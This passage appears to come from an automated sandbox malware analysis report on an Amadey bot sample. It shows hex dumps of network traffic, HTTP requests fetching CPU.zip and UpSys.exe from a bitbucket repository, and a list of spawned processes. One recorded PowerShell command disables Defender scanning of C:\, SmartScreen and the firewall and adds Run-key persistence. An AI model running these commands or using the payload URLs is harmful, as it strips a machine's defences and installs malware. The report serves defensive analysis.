fe 6e 4e 01 33 0a 58 48 ab 4c c5 e0 49 e9 13 a1 bd 0e ec 95 00 d4 da fb 6c 30 39 c7 01 b5 d1 2f c3 0d b8 61 d8 b7 8e 0f fa 54 e4 4e 00 93 01 1e b3 97 00 e1 52 d4 7d dc 9e af 73 58 0f 77 00
                                                                                                                                                                                Data Ascii: 9%bL]/KhO4s&;pK^)>,e4=; *9\YgEpUA+4;`d;Xe(.d<@,H_$d#LoueDqBnN3XHLIl09/aTNR}sXw
                                                                                                                                                                                2021-11-11 11:26:50 UTC9684INData Raw: 19 56 f4 e6 7d 00 62 07 30 a0 27 d4 22 20 0e 66 d3 91 8e 43 ae 5d cc f0 93 d6 2c 07 03 19 7b 47 a8 c0 59 bb f7 06 03 87 8e a5 22 73 ca e8 40 01 78 1f 92 dc 7c 4e 43 66 21 ad c9 1c 96 40 9d 4f 67 5d 00 3f 88 7e c0 2d 9e 79 cf 00 1e 5c 6c c8 30 11 0f 98 00 9a ec bf 8e 22 57 64 7d 00 fb 3a 27 71 ea b2 b5 32 e0 76 76 f5 03 42 c4 54 69 2a 20 88 2c 8f e9 77 6e 00 84 4e 7c 50 3f f2 c4 09 00 d2 f8 d4 f9 b3 a0 a5 3a 07 5b 34 ee a7 ba 01 f2 0a 41 60 93 57 00 4f 29 6c 45 24 e5 0f 90 0b f0 5d fe e8 8e 0c a0 a8 7e a6 ae 29 07 92 9f 8a c2 09 50 b9 b1 2f 56 00 ed 88 f7 2b cd 77 4e 98 00 bd 38 48 57 fc 64 16 a5 1d 62 35 96 c0 31 9f ea 32 8c 2c 00 f1 bd 5c 75 86 9a 53 a5 1f 13 0b 36 40 e5 fb 5b c8 e2 ca 79 37 00 70 6a c1 d7 84 db 1c f8 00 5c 5d 52 61 fa 54 b1 8d 07 95 1f
                                                                                                                                                                                Data Ascii: V}b0'" fC],{GY"s@x|NCf!@Og]?~-y\l0"Wd}:'q2vvBTi* ,wnN|P?:[4A`WO)lE$]~)P/V+wN8HWdb512,\uS6@[y7pj\]RaT
                                                                                                                                                                                2021-11-11 11:26:50 UTC9700INData Raw: 0e 1f 04 4e 8a 1d cc 40 20 24 5e 49 31 ad 00 3a 26 e1 51 74 91 98 12 00 f9 71 34 b1 6e 2d bd 9f 00 8b ad a1 8f 4a e5 1c ef 03 88 d5 e2 ac 62 08 d8 71 23 ae 00 f2 7c c3 3c 4a 69 ca 63 0f 15 86 eb 5f 20 bd 9b 87 2c 52 0f bb 02 82 ef 3f c1 e1 d5 5d 01 b8 c4 4c aa f0 26 00 7a c4 c6 a2 13 eb 5c 54 00 65 8a ab 27 29 48 8c 32 00 11 f0 92 95 e6 2d 66 ce 00 4a 33 51 a4 2f 1b 6b 9e 00 cf 54 22 09 60 cb 80 6d 00 1d 92 8b d2 48 0a cc c8 5c 8e aa 00 4f e6 f4 2c 72 c3 f7 00 2e bf 6e c5 19 b2 08 1a b8 4f 0b 6b d6 e4 60 0f 88 80 9b 44 a3 b0 41 7d 2b 00 71 24 8e 3c ec 8f 54 76 00 a5 cc e6 fc 6e 9a d5 17 00 0d cf 12 24 ef c1 41 97 71 bb 00 aa 98 34 21 a6 13 b4 42 00 40 e3 ae 96 ca cf 26 4f 1d a9 78 de 87 56 b1 a7 30 9c 48 70 74 13 6e 59 d9 01 41 63 1f 68 22 70 e4 b1 00 34
                                                                                                                                                                                Data Ascii: N@ $^I1:&Qtq4n-Jbq#|<Jic_ ,R?]L&z\Te')H2-fJ3Q/kT"`mH\O,r.nOk`DA}+q$<Tvn$Aq4!B@&OxV0HptnYAch"p4
                                                                                                                                                                                2021-11-11 11:26:50 UTC9716INData Raw: 0f c0 2a 60 25 00 ea 3f d9 e4 95 de b1 1c 00 69 87 40 e2 84 bc 18 21 00 d5 04 28 2d aa 4b 47 62 00 89 b6 07 1e a0 54 71 3e 3d 9b 8b 02 5d b5 cf bd 9f 61 04 93 dc d4 be 2e f5 97 7e 00 90 eb 1b 5a af c4 05 a6 6e b2 71 12 c0 52 78 56 99 0f fe 13 a4 4a 63 52 09 3b c8 88 6e fc 00 eb 6c 2d 80 54 6f 6d 0a 00 96 8e e8 51 7a 7c be 81 00 97 9a 69 2d f3 bb 0d b1 07 ba 37 d3 e6 61 20 8a 35 cd a5 00 f0 bd 8e 73 ce 4d f9 52 0e 68 d8 8c 5d 00 7f a7 ad a1 fe 07 09 c2 3c 51 af ce e0 83 ee 14 9b bf 00 f6 ab 29 27 e6 18 94 56 14 6b dd 77 ff 00 b7 b3 e8 96 cb 63 d0 00 bf 88 94 dc ad 6c d2 a6 00 80 04 5a 0e 07 37 dd 1c 00 38 2a 4c b0 42 4e 88 72 00 eb 4b 5b 8f 93 ec 43 ba 00 d9 63 26 bb 9d 33 44 69 00 48 e6 66 51 18 45 dd aa 3c ac 6e 00 0c e0 b7 0d c7 1d 5a 5c 28 04 00 cc 70
                                                                                                                                                                                Data Ascii: *`%?i@!(-KGbTq>=]a.~ZnqRxVJcR;nl-TomQz|i-7a 5sMRh]<Q)'VkwclZ78*LBNrK[Cc&3DiHfQE<nZ\(p
                                                                                                                                                                                2021-11-11 11:26:50 UTC9732INData Raw: cb 22 d0 44 d4 d8 89 dc 11 c4 1a 02 d7 24 f5 44 03 1b 04 b1 1c 08 e8 91 ef 22 f4 44 f8 fc 8b 82 1d 04 56 48 9b 91 a0 22 a4 44 a8 ac 88 07 20 81 57 12 6a 24 73 48 80 91 8f 22 a4 44 ae c1 89 c8 12 d4 24 ec 48 f1 91 fd 10 02 21 22 16 44 e5 ec 89 fe 11 12 22 02 1a 24 24 48 2d 91 3e 22 50 44 5f 9f 89 a5 12 b9 22 30 23 02 75 24 02 5c 25 04 e7 48 ef 91 f6 1b 5b 28 e9 10 09 4c 29 22 67 44 c1 4f 40 2a 93 89 bc 12 e3 24 f7 44 5b 2c 08 6c 91 7d 22 8e 20 62 2e 44 70 d8 88 0f 2f 80 9b 31 81 cb 12 fe 22 11 32 04 26 44 d4 36 08 e8 91 fa 10 41 38 22 c9 44 cd d1 89 d5 12 d9 24 dd 48 e1 91 e5 10 b4 3d 22 bb 44 d8 dc 89 e0 12 e4 24 e8 44 40 3e 04 6c 42 08 85 88 04 43 08 88 49 08 af 4a 08 9d 4b 11 a7 22 b4 44 e5 17 40 4c 28 89 33 12 80 24 a3 48 aa 91 c4 22 e2 44 fa 15 40 4d
                                                                                                                                                                                Data Ascii: "D$D"DVH"D Wj$sH"D$H!"D"$$H->"PD_"0#u$\%H[(L)"gDO@*$D[,l}" b.Dp/1"2&D6A8"D$H="D$D@>lBCIJK"D@L(3$H"D@M
                                                                                                                                                                                2021-11-11 11:26:50 UTC9748INData Raw: 37 e6 d7 00 aa 0c 58 ee 36 1e 25 9f 3c a8 f7 74 00 da 8b 17 c3 4b 4c 13 05 00 fb 3d fd 64 41 b4 fe d1 01 5d ea 2b 82 2a 4f 2d 80 84 22 99 45 87 fb 3a 7d 03 01 40 bc dc b8 08 a6 e1 40 aa 13 72 ad 00 f3 43 c6 47 84 d0 0c e5 00 c3 f7 cd 2f 21 04 77 ed 00 b9 48 d9 3d af 41 b2 56 00 06 58 28 fe 68 ef ba 39 1d e7 c6 79 00 d8 a2 40 5d 1b d5 00 94 8a 18 61 a9 56 64 8c e8 1f 00 d8 25 e4 c2 89 26 43 a1 7e 2d 00 e7 ad 7b db b9 0d 7c c7 98 65 f8 18 00 6a 31 91 8e 15 b0 47 ee 00 12 d2 01 99 bd 1a 30 bb 00 64 a0 9f 74 83 e2 c4 a4 00 b5 2d 9e 52 32 12 f3 ab 00 e4 b6 48 3e eb b0 3c 16 3e 17 6d 80 be 6a 6c aa fe 05 d9 3b 28 06 1d 70 2b 80 ca 2a 69 0f 6b 6e 00 5d b7 d8 5b 9e 27 04 c4 00 26 2d 1d fd 75 dc 4e f1 00 c0 a9 79 89 ed 7e 5b 9b 00 01 c7 92 c3 f2 f0 5f e3 1d 2c bc
                                                                                                                                                                                Data Ascii: 7X6%<tKL=dA]+*O-"E:}@@rCG/!wH=AVX(h9y@]aVd%&C~-{|ej1G0dt-R2H><>mjl;(p+*ikn]['&-uNy~[_,
                                                                                                                                                                                2021-11-11 11:26:50 UTC9764INData Raw: 56 f1 53 1c c1 48 3f 81 8c cf 3b 7f 55 30 cb 22 00 28 a0 2c 6b 2b f9 54 13 00 83 24 b2 b3 c0 52 77 be 00 9e 76 23 f3 b8 cd 33 8e 01 98 80 66 3f 8a 0d df 30 50 a7 fe b5 00 3e 8c c0 07 dd 7f c2 51 00 8a 17 3d 1d cc 99 e1 db 00 68 9b a0 0b 98 7b c6 72 2c 47 ce de 3f 80 7e e0 43 de 17 0d a8 03 db f7 d7 0a 78 62 e0 15 40 63 00 86 c0 a6 4c cc 8b f9 da 00 ce 64 34 0d d6 aa 0b 68 00 02 12 44 92 2a 4e 5a 2f 00 96 7d 15 8c 6c 73 97 90 f0 57 3f 9e 4c 00 26 04 f1 81 19 e7 12 00 56 de d2 41 b3 bd 78 5c 1c 7d a9 87 44 e3 1a 1b c0 d0 f6 9d b2 01 67 5a d7 11 80 0f 24 fc 29 19 00 3c 28 a2 91 db 30 c1 6f 1e 08 97 12 cf b2 a3 c0 01 b8 40 5c 55 01 59 ec fe 93 a8 a0 c3 e0 a2 1e 00 cf 70 4d 0d 82 c1 e9 85 01 28 21 36 d7 2e f9 f1 f8 38 59 2c a4 ae b2 01 9f e3 2c 0b e2 30 87 2f
                                                                                                                                                                                Data Ascii: VSH?;U0"(,k+T$Rwv#3f?0P>Q=h{r,G?~Cxb@cLd4hD*NZ/}lsW?L&VAx\}DgZ$)<(0o@\UYpM(!6.8Y,,0/
                                                                                                                                                                                2021-11-11 11:26:50 UTC9780INData Raw: ec 52 e5 a1 6f e0 c6 1b 2a 00 95 72 97 8a 41 17 61 bf 00 fa 2d 56 33 b6 0b f5 4d 26 84 47 f5 00 91 d2 85 6a 83 02 00 99 65 66 50 fd a6 9e 27 05 fa aa fb c6 c5 00 8e c0 9a 5c cb 95 00 92 6f a5 57 96 47 d3 1a 03 a6 36 5a 74 a9 1e b0 d9 f9 f4 0f 97 2e 31 68 e0 95 20 ef 6b 8f 00 4d 64 90 da 23 a8 5d b2 00 a9 0e 69 e6 ae fa 73 1d 27 0b 0d fc b2 00 38 1b e9 93 29 a0 00 43 5b de 95 73 64 3f 84 0f a2 ad dd eb 00 db ec 56 e3 35 1d 1e 90 d5 c0 0e 84 4c f5 43 92 07 85 45 e7 28 b5 20 27 e1 f8 59 48 bc 18 3d cd 8b ab 9e 91 00 86 f7 c6 e8 8d 00 96 af 29 b2 2e 13 a8 7c 2e 51 f1 90 00 c8 55 ea 1d f2 cf 00 7f 23 7a 36 0e b8 38 48 00 5c 3e 2b 4d 33 53 d4 8c 07 1b 7c 30 7f 20 80 fa eb 69 71 77 b8 0e 19 bb 66 1a 80 5f ac 8d ea 6b 07 c0 3b 80 95 08 80 83 3c 8a 1d 00 68 57 67
                                                                                                                                                                                Data Ascii: Ro*rAa-V3M&GjefP'\oWG6Zt.1h kMd#]is'8)C[sd?V5LCE( 'YH=).|.QU#z68H\>+M3S|0 iqwf_k;<hWg
                                                                                                                                                                                2021-11-11 11:26:50 UTC9796INData Raw: 01 7c c3 d4 5f fa 0d 71 70 89 97 00 d3 1f 76 03 39 e2 5e 21 07 a9 31 0c 5c 71 b0 e0 e8 a2 c8 00 08 36 83 e7 ef db e9 9c 30 0a 78 b4 40 6b b2 00 04 94 63 2a 91 21 47 e8 01 72 bc 48 26 ba b6 f6 ff df d0 24 02 f9 1e 1d f0 d0 2a 83 49 9b 41 18 90 9e d5 b5 01 4a fa ad 71 86 8d 5a 70 47 14 00 ae a7 48 5f 35 c8 93 fd 07 e2 f0 73 ce d3 c3 e4 b9 f8 2a 32 6c 7a ee 00 35 1b 0e 5b 05 7b c8 fd 03 02 19 b9 f7 63 b3 90 da dd 7e 00 b7 58 10 28 69 43 96 3c 00 cd 38 9a 48 d0 7b 7a c3 0e fb 8b 11 ae a0 10 db 74 3b d3 00 42 f0 64 0f 27 e8 73 cf 01 ed d7 31 af ec d9 3d cc b7 3c 00 86 23 a4 0c aa 5c 4f 06 07 80 ce ee 64 90 f0 21 68 71 a2 00 76 92 84 11 ca 7d c8 b9 1f 20 cc 77 c0 c1 66 17 71 64 08 00 1e 39 aa 3e 26 1a 8b 45 00 2e 86 d3 9c 6d 15 0b 7f 00 30 d0 9d be 3b ae ba 1a
                                                                                                                                                                                Data Ascii: |_qpv9^!1\q60x@kc*!GrH&$*IAJqZpGH_5s*2lz5[{c~X(iC<8H{zt;Bd's1=<#\Od!hqv} wfqd9>&E.m0;
                                                                                                                                                                                2021-11-11 11:26:50 UTC9812INData Raw: 50 00 a2 ec 1f 5c cc f4 1e 9a 03 b0 8a 53 e3 e0 40 ff 90 8d 5e 43 d1 7c fd 07 20 89 9b 7b 56 e0 61 68 9c 53 00 25 62 8d b5 c9 f9 d1 77 07 fb 9a 7b 4c c2 30 9b 73 a5 63 1f 76 ac fc 09 92 62 80 ac ba 8c ab 11 02 38 72 28 1c 2f af c0 91 fb 70 00 3b 13 93 fd 01 30 8c e1 02 29 aa 92 f3 bb 86 e0 f1 45 cb 03 64 1e 94 95 d1 40 d8 fb 52 2c 03 46 a4 59 b1 c0 c3 d8 81 97 b4 00 14 f8 6e 21 b9 cd a8 11 00 9d 3b 18 7d e0 81 1a 0d 01 6d 5f d0 d4 8a 03 be c8 33 8b 00 42 24 78 45 08 90 eb d1 00 af 9f 1c 77 fa 1b 0d ee 00 2e b1 c5 88 74 20 c1 16 3d d9 28 02 06 e1 c7 98 9d 40 50 43 cc 00 40 0e d7 3b 8f d1 e8 de 00 b4 03 6f b9 3d f9 32 cd 00 0f 2e b5 18 c4 80 d4 98 09 5d 8f ef 71 87 fe ba 50 62 b1 b2 28 0e f5 83 ae dd 80 c9 64 d5 6b da 00 8e f2 21 5b 69 f3 5c 10 00 b6 e3 63
                                                                                                                                                                                Data Ascii: P\S@^C| {VahS%bw{L0scvb8r(/p;0)Ed@R,FYn!;}m_3B$xEw.t =(@PC@;o=2.]qPb(dk![i\c


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                8192.168.2.549795104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:50 UTC7290OUTGET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:50 UTC9418INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999292.129
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 718.57
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: 5f6f4f2c7a601b49
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:50 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.021557
                                                                                                                                                                                X-Usage-System-Time: 0.000000
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22
                                                                                                                                                                                X-Served-By: 7276608ad1ce
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:26:50 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0339410305023
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 2407
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                9192.168.2.549803104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-11-11 11:26:52 UTC9822OUTGET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-11-11 11:26:53 UTC9823INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                X-Usage-Quota-Remaining: 999187.759
                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                X-Usage-Request-Cost: 823.70
                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                X-B3-TraceId: a63c19991b514194
                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                X-Dc-Location: Micros
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:52 GMT
                                                                                                                                                                                X-Usage-User-Time: 0.017671
                                                                                                                                                                                X-Usage-System-Time: 0.007040
                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-4242-93aa-1dc687b9b639/UpSys.exe?Signature=03SjwtOUVCkSGlVBOddWMUL2kd4%3D&Expires=1636631487&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=W.pANh85KmlWZmruQkzmM9Sllvu_UgzE&response-content-disposition=attachment%3B%20filename%3D%22UpSys.exe%22
                                                                                                                                                                                X-Served-By: a6368fc00b70
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 11:26:52 GMT
                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                X-Static-Version: a4fadf181312
                                                                                                                                                                                X-Render-Time: 0.0369701385498
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                X-Request-Count: 32
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Version: a4fadf181312
                                                                                                                                                                                X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:25:22
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\We7WnoqeXe.exe"
                                                                                                                                                                                Imagebase:0xa50000
                                                                                                                                                                                File size:3075288 bytes
                                                                                                                                                                                MD5 hash:382D9703B3918169DDC982D766509AEC
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:09
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\vms.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\vms.exe"
                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                File size:2776885 bytes
                                                                                                                                                                                MD5 hash:2BC350586FBDE00FFF7707D69C30941F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:12
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\slhost.exe"
                                                                                                                                                                                Imagebase:0x7ff7dcd60000
                                                                                                                                                                                File size:3731093 bytes
                                                                                                                                                                                MD5 hash:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:14
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:26
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
                                                                                                                                                                                Imagebase:0xc80000
                                                                                                                                                                                File size:2776885 bytes
                                                                                                                                                                                MD5 hash:2BC350586FBDE00FFF7707D69C30941F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000013.00000002.567557451.000000000167A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:31
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                                                                                                                                Imagebase:0x7ff617cb0000
                                                                                                                                                                                File size:447488 bytes
                                                                                                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:31
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:39
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:39
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:40
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
